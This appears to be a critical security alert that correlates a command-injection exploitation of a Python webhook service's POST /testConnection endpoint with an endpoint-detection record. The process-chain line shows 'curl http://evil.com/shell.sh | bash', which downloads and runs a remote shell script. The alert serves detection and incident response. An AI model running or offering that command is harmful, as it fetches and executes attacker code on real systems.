CRITICAL — Exploited Attack with Suspicious Execution (Risk Score: 99)
--- ADR Detection ---
Attack: cmd-injection
Application: cargo-cats-webhookservice (Python)
Endpoint: POST /testConnection
Sink: subprocess.run()
Source IP: 10.1.1.128
Result: EXPLOITED
--- EDR Detection ---
Product: [EDR product name]
Process: python → bash → curl http://evil.com/shell.sh | bash
Process path: /usr/bin/bash
Parent: /usr/bin/python3
User: appuser
--- Correlation ---
Join: Target hostname match within 30-minute window